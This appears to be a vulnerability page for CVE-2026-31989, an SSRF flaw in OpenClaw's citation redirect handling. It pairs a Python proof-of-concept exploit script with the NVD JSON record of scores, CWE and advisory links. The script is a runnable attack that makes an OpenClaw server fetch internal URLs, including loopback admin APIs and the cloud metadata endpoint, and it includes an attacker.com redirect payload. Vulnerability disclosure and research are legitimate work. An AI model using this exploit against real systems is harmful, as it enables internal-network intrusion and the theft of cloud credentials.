CVE-2026-31989

import requests # CVE-2026-31989 SSRF PoC # Target: OpenClaw < 2026.3.1 # Attack: Force OpenClaw server to make internal network requests def exploit_ssrf(target_url, internal_target): """ Exploit SSRF vulnerability in OpenClaw web_search citation redirect Args: target_url: OpenClaw server URL internal_target: Internal network target (e.g., http://127.0.0.1:8080/admin) Returns: Response from internal target (if vulnerable) """ # Construct malicious citation with internal redirect target # OpenClaw will follow this redirect to internal network payload = { 'citation_url': f'http://attacker.com/redirect?to={internal_target}', 'search_query': 'test' } # Alternative: Direct internal URL in citation field payload_direct = { 'citation_url': internal_target, 'search_query': 'test' } try: # Send request to OpenClaw response = requests.post( f'{target_url}/api/web_search/citation', data=payload_direct, timeout=10, allow_redirects=True ) return response.text except requests.exceptions.RequestException as e: return f'Error: {str(e)}' # Example targets for testing: # Internal services: http://127.0.0.1:8080, http://10.0.0.1:22, http://192.168.1.1 # Metadata service: http://169.254.169.254/latest/meta-data/ if __name__ == '__main__': target = 'http://vulnerable-openclaw-server.com' internal = 'http://127.0.0.1:8080/admin/api' result = exploit_ssrf(target, internal) print(result)

{"cve": {"id": "CVE-2026-31989", "sourceIdentifier": "[email protected]", "published": "2026-03-19T02:16:03.430", "lastModified": "2026-03-19T19:18:07.110", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions prior to 2026.3.1 contain a server-side request forgery vulnerability in web_search citation redirect resolution that uses a private-network-allowing SSRF policy. An attacker who can influence citation redirect targets can trigger internal-network requests from the OpenClaw host to loopback, private, or internal destinations."}, {"lang": "es", "value": "Versiones de OpenClaw anteriores a 2026.3.1 contienen una vulnerabilidad de falsificación de petición del lado del servidor en la resolución de redirección de citas de web_search que utiliza una política de SSRF que permite redes privadas. Un atacante que puede influir en los objetivos de redirección de citas puede desencadenar peticiones de red interna desde el host de OpenClaw a destinos de bucle invertido, privados o internos."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 3.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.3.1", "matchCriteriaId": "66AA451A-A5AE-4FD7-B42C-A868D720F4DF"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-g99v-8hwm-g76g", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-web-search-citation-redirect", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}